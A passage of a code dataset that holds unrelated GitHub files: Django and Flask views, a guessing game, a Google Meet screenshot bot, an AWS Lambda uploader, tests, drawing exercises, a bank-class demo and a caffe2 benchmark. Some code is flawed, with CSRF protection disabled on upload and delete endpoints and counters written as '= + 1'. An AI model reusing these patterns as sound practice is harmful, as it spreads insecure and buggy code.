seconds)\n del_req.save()\n\n return JsonResponse({\"videoId\": req_id, \"requestId\": unique_id})\n elif 'request-id' in get_body:\n conf_id = get_body['request-id']\n if DeleteRequests.objects.filter(confirmation_id=conf_id).exists():\n del_req = DeleteRequests.objects.get(confirmation_id=conf_id)\n vid_id = del_req.video\n elapsed_time = int(time.time()) - int(del_req.requested_millis)\n\n if elapsed_time < 120:\n if video_remover(vid_id):\n update_views()\n return JsonResponse({\"status\": \"OK\"})\n else:\n return JsonResponse({\"status\": \"Failed\"}, status=400)\n\n else:\n return JsonResponse({\"status\": \"TimeOut\"}, status=400)\n\n else:\n raise BadRequest(\"Invalid request id\")\n\n else:\n raise BadRequest(\"'video-id' not found\")\n\n\ndef get_video_labels(video_id):\n label_ids = [obj.label for obj in VideoLabels.objects.filter(video=video_id)]\n _labels = [Labels.objects.get(id=obj).label for obj in label_ids]\n return _labels\n\n\n@csrf_exempt\ndef say_hello(request):\n return HttpResponse(loader.get_template('index.html').render())\n\n\n@csrf_exempt\ndef upload(request):\n if request.method == \"POST\":\n uploaded_files = request.FILES.getlist(\"file\")\n vid_labels = request.POST.getlist('labels')\n\n if len(uploaded_files) == 0:\n return HttpResponse(\"InvalidRequest\")\n\n failed_files = {}\n succeeded = {}\n\n for curr_file in uploaded_files:\n fs = FileSystemStorage()\n print(date.today())\n\n file_name = curr_file.name\n file_type = curr_file.content_type.split('/')[0]\n\n if len(uploaded_files) == 1:\n try:\n video_title = request.POST.getlist('name')[0]\n except IndexError:\n video_title = file_name.split('.')[0]\n\n if video_title == \"\":\n video_title = file_name.split('.')[0]\n else:\n video_title = file_name.split('.')[0]\n\n unique_filename = str(uuid.uuid4().hex)\n\n path = \"media/videos/\" + unique_filename\n\n if file_type != \"video\":\n failed_files[file_name] = \"InvalidType\"\n remove_folder(path)\n continue\n\n file_ext = str(file_name).split('.')[-1]\n\n _file = \"media/videos/%s/video/\" % unique_filename + unique_filename + \".\" + file_ext\n file_media_path = \"videos/%s/video/\" % unique_filename + unique_filename + \".\" + file_ext\n\n make_folder(\"media/videos/%s/video/\" % unique_filename)\n fs.save(file_media_path, curr_file)\n\n try:\n duration = video_duration(_file)\n except:\n failed_files[file_name] = \"ParseError\"\n remove_folder(path)\n continue\n\n if duration < 15:\n failed_files[file_name] = \"ShortVideo\"\n remove_folder(path)\n continue\n\n try:\n generate_thumbnail(_file, 0.2, \"media/videos/%s/thumbnail/\" % unique_filename, \"thumbnail.jpg\")\n generate_preview(_file, duration, \"media/videos/%s/preview/\" % unique_filename, \"preview.mp4\")\n\n except:\n failed_files[file_name] = \"ParseError\"\n remove_folder(path)\n continue\n\n try:\n video = Video.objects.create(\n title=video_title,\n location=_file,\n prev_loc=\"media/videos/%s/preview/%s\" % (unique_filename, \"preview.mp4\"),\n thumb_loc=\"media/videos/%s/thumbnail/%s\" % (unique_filename, \"thumbnail.jpg\"),\n views=0,\n length=int(duration)\n )\n video.save()\n\n vid_id = video.id\n label_ids = get_set_label_ids(vid_labels)\n\n save_labels(vid_id, label_ids)\n succeeded[vid_id] = video_title\n\n except:\n print(\"Database failed\")\n remove_folder(path)\n traceback.print_exc()\n\n return JsonResponse({\n \"failedFiles\": failed_files,\n \"succeeded\": succeeded\n })\n else:\n return HttpResponse(\"what is this\")\n\n\ndef paged_video_data(videos, request, page=-1, no_of_videos=15):\n max_videos = len(videos)\n starting_index = 0 if page == -1 else (page - 1) * no_of_videos\n ending_index = max_videos if page == -1 else page * no_of_videos\n data_dict = {\"data\": [], \"pages\": int(math.ceil(max_videos / no_of_videos))}\n host = request.get_host()\n for row in videos[starting_index:ending_index]:\n data_dict['data'].append({\n \"id\": row[0],\n \"title\": row[1],\n \"preview\": host + \"/\" + row[3],\n \"thumbnail\": host + \"/\" + row[4],\n \"length\": row[6],\n \"views\": row[7]\n })\n return data_dict\n\n\ndef get_all_videos(request):\n if request.method == \"GET\":\n get_body = request.GET\n if 'video-id' in get_body:\n try:\n req_id = int(get_body['video-id'])\n video_obj = Video.objects.get(id=req_id)\n except ValueError:\n raise BadRequest(\"Invalid Request\")\n except ObjectDoesNotExist:\n raise BadRequest(\"Invalid video id\")\n\n video_obj.views += 1\n update_views(int(request.GET['video-id']))\n video_obj.save()\n\n return JsonResponse(\n {\n \"title\": video_obj.title,\n \"url\": request.get_host() + \"/\" + str(video_obj.location),\n \"views\": video_obj.views,\n \"date\": video_obj.date,\n \"labels\": get_video_labels(video_obj.id)\n }\n )\n\n max_amount = 15\n\n if 'max' in get_body:\n try:\n max_amount = int(get_body['max']) if int(get_body['max']) > 0 else 15\n except ValueError:\n max_amount = 15\n\n if 'page' in get_body:\n try:\n page = int(get_body['page'])\n if page < 1:\n raise BadRequest(\"Invalid page number\")\n return JsonResponse(\n paged_video_data(Video.objects.values_list(), request, page, no_of_videos=max_amount))\n except ValueError:\n raise BadRequest(\"Invalid page number\")\n\n return JsonResponse(paged_video_data(Video.objects.values_list(), request))\n\n\ndef search(request):\n if request.method == \"GET\":\n get_body = request.GET\n page = 1\n if 'filter' not in get_body and 'q' not in get_body:\n raise BadRequest(\"Invalid Request\")\n query = \"\"\n if 'q' in get_body:\n query = get_body['q']\n\n max_amount = 15\n\n if 'max' in get_body:\n try:\n max_amount = int(get_body['max']) if int(get_body['max']) > 0 else 15\n except ValueError:\n max_amount = 15\n\n if 'page' in get_body:\n try:\n page = int(get_body['page'])\n if page < 1:\n raise BadRequest(\"Invalid page number\")\n\n except ValueError:\n raise BadRequest(\"Invalid page number\")\n\n filters = request.GET.getlist('filter')\n print(filters)\n videos = Video.objects.filter(title__contains=query)\n if len(filters) == 0:\n data_dict = paged_video_data(video_sets_creator(videos), request, page, max_amount)\n return JsonResponse(data_dict)\n for _filter in filters:\n if not Labels.objects.filter(label=_filter).exists():\n return HttpResponse(\"Invalid filter\", status=400)\n\n label_ids = get_label_ids(filters)\n filtered_videos = []\n filtered_videos_obj = []\n for label_id in label_ids:\n video_ids = [curr_id['video'] for curr_id in VideoLabels.objects.filter(label=label_id).values('video')]\n filtered_videos += video_ids\n for video in videos:\n if video.id in filtered_videos:\n filtered_videos_obj.append(video)\n\n data_dict = paged_video_data(video_sets_creator(filtered_videos_obj), request, page, max_amount)\n return JsonResponse(data_dict)\n","repo_name":"irusha/cs50fp","sub_path":"homehub/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23146007375","text":"# Functions\r\n\r\n# checks users enter an integer between a low and high number\r\ndef int_check(question, low=None, high=None):\r\n situation = \"\"\r\n\r\n if low is not None and high is not None:\r\n situation = \"both\"\r\n elif low is not None and high is None:\r\n situation = \"low only\"\r\n\r\n while True:\r\n try:\r\n # Ask the question\r\n response = int(input(question))\r\n\r\n # Checks input is not too high or\r\n # too low if a both upper and\r\n # lower bounds are specified\r\n if situation == \"both\":\r\n if response < low or response > high:\r\n print(\"Please enter a number between \"\r\n f\"{low} and {high}\")\r\n continue\r\n\r\n # Checks input is not too low\r\n elif situation == \"low only\":\r\n if response < low:\r\n print(\"Please enter a number that is more\"\r\n f\"than (or equal to) {low}\")\r\n continue\r\n\r\n return response\r\n\r\n # Checks input is an integer\r\n except ValueError:\r\n print(\"Please enter an integer\")\r\n continue\r\n\r\n\r\n# Main Routine\r\nsec_num = 50\r\nlow_num = 1\r\nhigh_num = 100\r\n\r\n\r\nresult = \"wrong\"\r\nwhile result == \"wrong\":\r\n\r\n user_guess = int_check(\"Please enter your guess: \", low_num, high_num)\r\n\r\n if user_guess < sec_num:\r\n print(\"Higher\")\r\n num_guesses = + 1\r\n\r\n if user_guess > sec_num:\r\n print(\"Lower\")\r\n num_guesses = + 1\r\n\r\n if user_guess == sec_num:\r\n num_guesses = + 1\r\n rounds_won = + 1\r\n result = \"Won\"\r\n continue\r\n\r\n\r\nrounds_played = + 1\r\nprint(f\"You {result}\")\r\nprint()\r\n\r\n\r\n","repo_name":"smithr1057/07_Higher_lower-","sub_path":"04_user_hl.py","file_name":"04_user_hl.py","file_ext":"py","file_size_in_byte":1758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30739643256","text":"# coding: utf-8\nfrom flask import Blueprint, render_template, request, jsonify\nfrom models.member import Member\nimport math\n\nadmin_view = Blueprint('admin_view', __name__)\n\n@admin_view.route('/')\ndef index():\n return render_template('admin/index.jade', data = {'a': 123})\n\n@admin_view.route('/fetch_members', methods = ['POST'])\ndef fetch_members():\n rows = 10\n page = 0\n if request.json.has_key('rows'):\n rows = int(request.json['rows'])\n if request.json.has_key('page'):\n page = int(request.json['page'])\n data = Member.fetch_members(page = page, rows = rows)\n count = Member.query.count()\n pages = 1\n if count > 0: pages = int(math.ceil(count / float(rows)))\n return jsonify({'status': 0, 'data': data, 'pages': pages})\n\n@admin_view.route('/update_member', methods = ['POST'])\ndef update_member():\n Member.update_member(request.json)\n return jsonify({'status': 0})","repo_name":"mymy3697166/patg","sub_path":"controllers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40499213422","text":"\"\"\"\n\n 1. Detect new user come in\n 2. Detect new user left\n 3. post to chat\n 4. take screen photo\n 5. save screen photo to directory\n 6. stich it all into mosaic image ( side mission )\n\n\"\"\"\n\nimport time\nimport calendar\nimport re\nimport os\n\nimport module_mouse_coordinate_capture\nimport module_mouse_click\nimport module_screen_take_photo\nimport module_screen_read_photo\nimport module_screen_crop_and_save_photo\nimport module_keyboard_type\n\n\nprint(\"----- WELCOME-----\")\n\nprint(\"First, please click on icon of 'Chat' Tab title header\")\nx_chat_title, y_chat_title = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_chat_title, y_chat_title)\n\nprint(\"Second, please click on Chat Box\")\nx_chat_box, y_chat_box = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_chat_box, y_chat_box)\n\nprint(\"Please click on icon of 'People (..)' Tab title header\")\nx_people_title, y_people_title = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_people_title, y_people_title)\n\nprint(\"Please click on second line of guest list, where the guest's icon will be at\")\nx_guest_name, y_guest_name = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_guest_name, y_guest_name)\n\nprint(\"Please click on Top Left Of guest's Headshot Photo on Screen\")\nx_top_left_headshot, y_top_left_headshot = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_top_left_headshot, y_top_left_headshot)\n\nprint(\"Please click on Bottom Right Of guest's Headshot Photo on Screen\")\nx_bottom_right_headshot, y_bottom_right_headshot = module_mouse_coordinate_capture.capture_coordinate()\nprint(\" detected, \", x_bottom_right_headshot, y_bottom_right_headshot)\n\n\n\n\nprint(\"----- CONFIGURATION COMPLETED -----\")\n\ntime.sleep(3);\n\nprint(\"----- TAKING PHOTOS -----\")\n\n# Loop:\n# 1. Capture Screen Shot, Parse Human Count\n# 2. If !1 people, Click on Chat Tab\n# 2. Parse Name\n# 2. Print \"Taking Picture in 3..\"\n# 2. Print \"Smile\"\n# 2. Save file captured in step (1), cropped with top-left and bottom_right in config-gathering, and save as {guest-name}.png\n# 2. Print \"Done, Thank you 'name', Please leave!\"\n# 2. Click on People Tab\n# 2. ElIf 1 people, Pass\n# 2. Sleep 3 second\n\nwhile True:\n\n module_mouse_click.click(x_people_title, y_people_title, True)\n\n # Sub Step A:\n scout_file_name = \"photos/scouting.png\"\n module_screen_take_photo.save_screen_shot(scout_file_name)\n text_guest_count = module_screen_read_photo.ocr_core(scout_file_name, x_people_title, y_people_title)\n\n count_human = 1;\n count_human_str_search = re.search(' \\(([0-9]+)\\)', text_guest_count)\n if count_human:\n count_human = int(count_human_str_search.group(1))\n\n print(count_human)\n # Sub Step B\n if count_human == 2:\n text_guest_name = module_screen_read_photo.ocr_core(scout_file_name, x_guest_name, y_guest_name).strip()\n print('Handling : ', text_guest_name)\n\n module_mouse_click.click(x_chat_title, y_chat_title, True)\n time.sleep(1)\n\n # Sub Step C, D\n module_keyboard_type.type_string('Taking picture in: 3, 2...')\n module_keyboard_type.enter()\n time.sleep(3)\n module_keyboard_type.type_string('Smile!')\n module_keyboard_type.enter()\n module_keyboard_type.enter()\n time.sleep(1)\n\n # Sub Step E: Save this image\n guest_file_name = './photos/{}__{}.png'.format(text_guest_name, str(calendar.timegm(time.gmtime())));\n module_screen_crop_and_save_photo.crop_and_save(scout_file_name, guest_file_name, x_top_left_headshot, y_top_left_headshot, x_bottom_right_headshot, y_bottom_right_headshot);\n\n\n # Sub Step F: Kick them out\n module_keyboard_type.type_string('Thank you {}, You can leave now!'.format(text_guest_name))\n module_keyboard_type.enter()\n module_keyboard_type.enter()\n\n time.sleep(5)\n\n # Sub Step G: Click on People Tab\n module_mouse_click.click(x_people_title, y_people_title, True)\n\n\n elif count_human > 2:\n print(\"TOO MANY PEOPLE\")\n\n time.sleep(3)\n","repo_name":"ikendoit/google-meet-headshot-photography","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27127336405","text":"import boto3\nimport requests\nfrom requests_aws4auth import AWS4Auth\nimport os\nimport json\nimport datetime\n\nregion = 'us-east-1'\nservice = 'es'\ncredentials = boto3.Session().get_credentials()\nawsauth = AWS4Auth(credentials.access_key, credentials.secret_key, region, service, session_token=credentials.token)\n\nindex = 'lambda-s3-index'\ntype = 'lambda-type'\nhost = os.environ['ES_DOMAIN_URL']\nurl = host + '/' + index + '/' + type\n\nheaders = { \"Content-Type\": \"application/json\" }\n\ns3 = boto3.client('s3')\nbucket = os.environ['S3_BUCKET']\n\n# Lambda execution starts here\ndef handler(event, context):\n \n sensorID = event['sensorID']\n timestamp = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n temperature = event['temperature']\n \n document = { \"sensorID\": sensorID, \"timestamp\": timestamp, \"temperature\": temperature }\n print(document)\n # post to S3 for storage\n s3.put_object(Body=json.dumps(document).encode(), Bucket=bucket, Key=sensorID+\"-\"+timestamp+\".json\")\n # post to amazon elastic search for indexing and kibana use\n r = requests.post(url, auth=awsauth, json=document, headers=headers)\n print(r)\n response = \"Data Uploaded\"\n return {\n \"Response\" : response,\n \"sensorID\" : sensorID,\n \"temperature\": temperature\n }","repo_name":"luch-o/aws-arch-course","sub_path":"datalakes-course/w2-opensearch-cluster/upload_data/upload_data.py","file_name":"upload_data.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"467090729","text":"# coding: utf8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport mock\nimport pytest\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom rest_framework.test import APIRequestFactory\n\nfrom common.tester.factories import create_station\nfrom travel.rasp.train_api.train_purchase.core.factories import TrainOrderFactory, PaymentFactory\nfrom travel.rasp.train_api.train_purchase.utils.decorators import order_view\n\n\ndef call_api_order_view(uid):\n inner_mock = mock.Mock(__name__=b'inner_mock', return_value=Response())\n actual_order_view = order_view()\n view = api_view()(actual_order_view(inner_mock))\n return view(APIRequestFactory().get('/'), uid=uid), inner_mock\n\n\n@pytest.mark.dbuser\n@pytest.mark.mongouser\ndef test_order_view():\n order = TrainOrderFactory()\n response, inner_mock = call_api_order_view(order.uid)\n\n assert response.status_code == 200\n inner_mock.assert_called_once_with(mock.ANY, order)\n\n\ndef test_order_view_not_found():\n response, inner_mock = call_api_order_view('invalid_uid')\n\n assert response.status_code == 404\n assert response.data == {'errors': {'uid': 'Order was not found'}}\n inner_mock.assert_not_called()\n\n\n@pytest.mark.dbuser\n@pytest.mark.mongouser\ndef test_order_view_unhandled_exception_state_booking():\n station_from = create_station()\n station_to = create_station()\n order = TrainOrderFactory(station_from=station_from, station_to=station_to,\n process={'state': 'unhandled_exception_state'})\n response, inner_mock = call_api_order_view(order.uid)\n\n assert response.status_code == 500\n assert response.data == {\n 'errors': {\n 'process_exception_state': {\n 'type': 'process_exception_state',\n 'data': {'orderNumber': None},\n 'message': None\n }\n }\n }\n inner_mock.assert_not_called()\n\n order = TrainOrderFactory(station_from=station_from, station_to=station_to,\n process={'state': 'unhandled_exception_state'}, partner_data=dict(order_num='100500'))\n response, inner_mock = call_api_order_view(order.uid)\n\n assert response.status_code == 500\n assert response.data == {\n 'errors': {\n 'process_exception_state': {\n 'type': 'process_exception_state',\n 'data': {'orderNumber': '100500'},\n 'message': None\n }\n }\n }\n inner_mock.assert_not_called()\n\n\n@pytest.mark.dbuser\n@pytest.mark.mongouser\ndef test_order_view_unhandled_exception_state_payment():\n station_from = create_station()\n station_to = create_station()\n order = TrainOrderFactory(station_from=station_from, station_to=station_to, partner_data=dict(order_num='200500'))\n PaymentFactory(order_uid=order.uid, process={'state': 'unhandled_exception_state'})\n\n response, inner_mock = call_api_order_view(order.uid)\n\n assert response.status_code == 500\n assert response.data == {\n 'errors': {\n 'process_exception_state': {\n 'type': 'process_exception_state',\n 'data': {'orderNumber': '200500'},\n 'message': None\n }\n }\n }\n inner_mock.assert_not_called()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/train_purchase/utils/test_decorators.py","file_name":"test_decorators.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13451589100","text":"# -*- coding: utf-8 -*-\n\nimport simple_draw as sd\n\n# Запросить у пользователя желаемую фигуру посредством выбора из существующих\n# вывести список всех фигур с номерами и ждать ввода номера желаемой фигуры.\n# и нарисовать эту фигуру в центре экрана\n\n# Код функций из упр lesson_004/02_global_color.py скопировать сюда\n# Результат решения см lesson_004/results/exercise_03_shape_select.jpg\n\nCOLORS = [\n {'name': 'красный', 'name_root': 'красн', 'code': sd.COLOR_RED},\n {'name': 'оранжевый', 'name_root': 'оранж', 'code': sd.COLOR_ORANGE},\n {'name': 'жёлтый', 'name_root': 'желт', 'code': sd.COLOR_YELLOW},\n {'name': 'зелёный', 'name_root': 'зелен', 'code': sd.COLOR_GREEN},\n {'name': 'голубой', 'name_root': 'голуб', 'code': sd.COLOR_CYAN},\n {'name': 'синий', 'name_root': 'син', 'code': sd.COLOR_BLUE},\n {'name': 'фиолетовый', 'name_root': 'фиол', 'code': sd.COLOR_PURPLE},\n]\n\n\ndef draw_polygon(origin=None, angle=0, side_length=10, sides_number=4, color=sd.COLOR_YELLOW):\n if not isinstance(origin, sd.Point):\n print('Incorrect point')\n return\n angle_step = round(360 / sides_number)\n next_start_point = origin\n\n for next_angle in range(angle, 360 + angle - angle_step, angle_step):\n next_start_point = sd.vector(start=next_start_point, angle=next_angle, length=side_length, color=color)\n\n sd.line(next_start_point, origin, color=color)\n\n\ndef draw_triangle(origin=None, angle=0, side_length=10, color=sd.COLOR_YELLOW):\n draw_polygon(origin=origin, angle=angle, side_length=side_length, sides_number=3, color=color)\n\n\ndef draw_square(origin=None, angle=0, side_length=10, color=sd.COLOR_YELLOW):\n draw_polygon(origin=origin, angle=angle, side_length=side_length, sides_number=4, color=color)\n\n\ndef draw_pentagon(origin=None, angle=0, side_length=10, color=sd.COLOR_YELLOW):\n draw_polygon(origin=origin, angle=angle, side_length=side_length, sides_number=5, color=color)\n\n\ndef draw_hexagon(origin=None, angle=0, side_length=10, color=sd.COLOR_YELLOW):\n draw_polygon(origin=origin, angle=angle, side_length=side_length, sides_number=6, color=color)\n\n\nPOLYGONS = [\n {'name': 'треугольник', 'function': draw_triangle},\n {'name': 'квадрат', 'function': draw_square},\n {'name': 'пятиугольник', 'function': draw_pentagon},\n {'name': 'шестиугольник', 'function': draw_hexagon},\n]\n\n\n# сп��ашиваем цвет\nglobal_color = None\nwhile not global_color:\n for number, color in enumerate(COLORS):\n print(f' {number} - {color[\"name\"]}')\n user_answer = input('Введите номер или назовите цвет радуги, '\n 'которым вы хотите нарисовать фигуры > ')\n user_answer = user_answer.lower().replace('ё', 'е')\n\n # если пользователь ввёл число, то просто дёргаем цвет по номеру из COLORS\n if user_answer.isnumeric():\n user_answer = int(user_answer)\n if 0 <= user_answer <= len(COLORS):\n global_color = COLORS[user_answer]['code']\n\n else:\n # перебирая цвета ищем корень в строке, которую ввёл пользователь и возвращаем соответствующий цвет\n for color in COLORS:\n if color['name_root'] in user_answer:\n global_color = color['code']\n break\n\n if not global_color:\n print('\\nВы ввели некорректный цвет. Напишите на русском языке один из цветов радуги, либо введите его номер.\\n'\n 'Подсказка:')\n\n# спрашиваем количество сторон\npolygon_function = None\nprint()\nwhile not polygon_function:\n for number, polygon in enumerate(POLYGONS):\n print(f' {number} - {polygon[\"name\"]}')\n user_answer = input('Какую фигуру вы хотите нарисовать? > ')\n\n if user_answer.isnumeric():\n user_answer = int(user_answer)\n if 0 <= user_answer <= len(POLYGONS):\n polygon_function = POLYGONS[user_answer]['function']\n\n else:\n print('\\nКажется, вы случайно ввели не тот номер. Попробуйте ещё раз.')\n\nsd.resolution = (600, 600)\n\npolygon_origin = sd.get_point(100, 100)\npolygon_function(origin=polygon_origin, angle=20, side_length=100, color=global_color)\n\n\nsd.pause()\n\n# зачет!\n","repo_name":"glotyuids/skillbox_learning","sub_path":"lesson_004/03_shape_select.py","file_name":"03_shape_select.py","file_ext":"py","file_size_in_byte":4873,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14648117238","text":"from random import randint\n\n\nclass Agencia:\n\n def __init__(self, telefone, cnpj, numero):\n self.telefone = telefone\n self.cnpj = cnpj\n self.numero = numero\n self.clientes = []\n self.caixa = 0\n self.emprestimos = []\n\n def verificar_caixa(self):\n if self.caixa < 1000000:\n print('Caixa abaixo do nível recomendado. Caixa atual: R${:,.2f}'.format(self.caixa))\n else:\n print('O valor do caixa está ok. Caixa atual: R${:,.2f}'.format(self.caixa))\n\n def emprestar_dinheiro(self, valor, cpf, juros):\n if self.caixa > valor:\n self.emprestimos.append((valor, cpf, juros))\n else:\n print('Sem dinheiro pra emprestar')\n \n def adicionar_cliente(self, nome, cpf, patrimonio):\n self.clientes.append((nome, cpf, patrimonio))\n\n\nclass AgenciaVirtual(Agencia):\n \n def __init__(self, site, telefone, cnpj):\n self.site = site\n super().__init__(telefone, cnpj, 1000)\n self.caixa = 1000000\n self.caixa_paypal = 0\n\n def depositar_paypal(self, valor):\n if self.caixa > valor:\n self.caixa -= valor\n self.caixa_paypal += valor\n print('Transferência concluída\\nValor do caixa: R${:,.2f}\\nValor paypal:R${:,.2f}'.format(self.caixa, self.caixa_paypal))\n else:\n print('Valor de caixa insuficiente para a transferência!')\n\n def sacar_paypal(self, valor):\n if self.caixa_paypal > valor:\n self.caixa_paypal -= valor\n self.caixa += valor\n print('Transferência concluída\\nValor do caixa: R${:,.2f}\\nValor paypal:R${:,.2f}'.format(self.caixa, self.caixa_paypal))\n else:\n print('Valor de caixa do paypal insuficiente para a transferência!')\n\n\nclass AgenciaComum(Agencia):\n \n def __init__(self, telefone, cnpj):\n super().__init__(telefone, cnpj, numero=randint(1001, 9999))\n self.caixa = 1000000\n\n\nclass AgenciaPremium(Agencia):\n\n def __init__(self, telefone, cnpj):\n super().__init__(telefone, cnpj, numero=randint(1001, 9999))\n self.caixa = 10000000\n\n def adicionar_cliente(self, nome, cpf, patrimonio):\n if patrimonio >= 1000000:\n super().adicionar_cliente(nome, cpf, patrimonio)\n else:\n print('Não é possível adicionar o cliente.')\n\n\n\n#Código\nif __name__ == '__main__':\n agencia1 = Agencia(20203891, 2040281039, 3748)\n\n agencia_virtual = AgenciaVirtual('www.agenciavirtual.com', 22224444, 1921000000)\n agencia_virtual.verificar_caixa()\n\n agencia_comum = AgenciaComum(33332222, 323422222)\n agencia_premium = AgenciaPremium(22918493, 3920000010)\n\n agencia_virtual.depositar_paypal(20000)\n agencia_premium.adicionar_cliente('Pedro', 74892730281, 1000000)\n print(agencia_premium.clientes)\n","repo_name":"GabriellCabrall/python-impressionador","sub_path":"Modulo_37_Orientacao_a_objetos/Agencia.py","file_name":"Agencia.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14816608079","text":"\n\nimport argparse\nimport datetime\n\nimport numpy as np\nfrom caffe2.python import core, workspace\n\n\nDTYPES = {\n \"uint8\": np.uint8,\n \"uint8_fused\": np.uint8,\n \"float\": np.float32,\n \"float16\": np.float16,\n}\n\n\ndef benchmark_sparse_lengths_sum(\n dtype_str,\n categorical_limit,\n embedding_size,\n average_len,\n batch_size,\n iterations,\n flush_cache,\n):\n print(\"Preparing lookup table. \" + str(datetime.datetime.now()))\n\n # We will use a constant, but non-trivial value so we save initialization\n # time.\n data = np.ones([categorical_limit, embedding_size], dtype=np.float32)\n data *= 17.01\n\n if dtype_str == \"uint8\":\n scale_bias = np.random.rand(categorical_limit, 2).astype(np.float32)\n workspace.FeedBlob(\"scale_bias\", scale_bias.astype(np.float32))\n elif dtype_str == \"uint8_fused\":\n scale_bias = np.random.randint(255, size=(categorical_limit, 8))\n data = np.concatenate([data, scale_bias], axis=1)\n\n print(\"Data has shape {} {}\".format(data.shape, datetime.datetime.now()))\n workspace.FeedBlob(\"X\", data.astype(DTYPES[dtype_str]))\n\n # In order to produce truly random lengths and indices, we will embed a\n # Python operator in the net to generate them.\n def f(_, outputs):\n lengths = np.random.randint(\n int(np.round(average_len * 0.75)),\n int(np.round(average_len * 1.25)) + 1,\n batch_size,\n ).astype(np.int32)\n indices = np.random.randint(0, categorical_limit, np.sum(lengths)).astype(\n np.int64\n )\n outputs[0].feed(indices)\n outputs[1].feed(lengths)\n\n init_net = core.Net(\"init_net\")\n init_net.Python(f)([], [\"indices\", \"lengths\"])\n workspace.RunNetOnce(init_net)\n\n net = core.Net(\"mynet\")\n if flush_cache:\n l3_cache_size = 30 * 2 ** 20 // 4\n workspace.FeedBlob(\n \"huge_blob\", np.random.randn(l3_cache_size).astype(np.float32)\n )\n net.Scale(\"huge_blob\", \"huge_blob_2x\", value=2.0)\n if dtype_str == \"uint8\":\n net.SparseLengthsSum8BitsRowwise([\"X\", \"indices\", \"lengths\", \"scale_bias\"], \"Y\")\n elif dtype_str == \"uint8_fused\":\n net.SparseLengthsSumFused8BitRowwise([\"X\", \"indices\", \"lengths\"], \"Y\")\n else:\n net.SparseLengthsSum([\"X\", \"indices\", \"lengths\"], \"Y\")\n workspace.CreateNet(net)\n\n # Set random seed, so that repeated runs will keep the same sequence of\n # random indices.\n np.random.seed(1701)\n\n print(\"Preparation finished. \" + str(datetime.datetime.now()))\n\n runtimes = workspace.BenchmarkNet(net.Name(), 1, iterations, True)\n print(\n \"{} billion sums per cycle\".format(\n embedding_size\n * workspace.FetchBlob(\"indices\").size\n / runtimes[2 if flush_cache else 1]\n / 1e6\n )\n )\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(\n description=\"minimal benchmark for sparse lengths sum.\"\n )\n parser.add_argument(\n \"-d\",\n \"--dtype\",\n choices=list(DTYPES.keys()),\n default=\"float\",\n help=\"The data type for the input lookup table.\",\n )\n parser.add_argument(\n \"-e\", \"--embedding-size\", type=int, default=6000000, help=\"Lookup table size.\"\n )\n parser.add_argument(\n \"--embedding-dim\", type=int, default=128, help=\"Embedding dimension.\"\n )\n parser.add_argument(\n \"--average-len\",\n type=int,\n default=27,\n help=\"Sparse feature average lengths, default is 27\",\n )\n parser.add_argument(\"--batch-size\", type=int, default=100, help=\"The batch size.\")\n parser.add_argument(\n \"-i\", \"--iteration\", type=int, default=100000, help=\"The number of iterations.\"\n )\n parser.add_argument(\n \"--flush-cache\", action=\"store_true\", help=\"If true, flush cache\"\n )\n args, extra_args = parser.parse_known_args()\n core.GlobalInit([\"python\"] + extra_args)\n benchmark_sparse_lengths_sum(\n args.dtype,\n args.embedding_size,\n args.embedding_dim,\n args.average_len,\n args.batch_size,\n args.iteration,\n args.flush_cache,\n )\n","repo_name":"pytorch/pytorch","sub_path":"caffe2/python/operator_test/sparse_lengths_sum_benchmark.py","file_name":"sparse_lengths_sum_benchmark.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"42700300548","text":"from django.http import HttpResponse\nfrom django.template.context_processors import csrf\nfrom django.core import serializers\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.hashers import make_password\nfrom django.shortcuts import render, render_to_response, redirect\nfrom django.utils.translation import ugettext_lazy as _\nfrom django.utils import timezone\nfrom django.views import generic\n\nfrom users.models import EvoUser, UserForm\nfrom utils.decorators import ajax_view, AjaxError\n\nimport logging, sys\n\nlogger = logging.getLogger(__name__)\n# print >>sys.stderr, \"Groups\"\n# c.update(csrf(request))\n\ndef sign_up(request):\n if request.method == 'POST':\n params = request.POST.copy()\n \n params['password'] = make_password(params['password'])\n params['created_at'] = timezone.now()\n params['updated_at'] = timezone.now()\n params['date_joined'] = timezone.now()\n params['last_login'] = timezone.now()\n\n form = UserForm(data = params, auto_id=True)\n \n if form.is_valid():\n user = form.save()\n user.is_active = True\n user.save()\n \n form_msg = _(\"the user was successfully registered\")\n return render(request, 'users/_sign_up_success.html', {'form_msg': form_msg})\n else:\n form_errors = form.errors\n# form_cleaned = form.cleaned_data\n return render(request, 'users/_sign_up_errors.html', {'form_errors': form_errors})\n else:\n form = UserForm(auto_id=True)\n context = 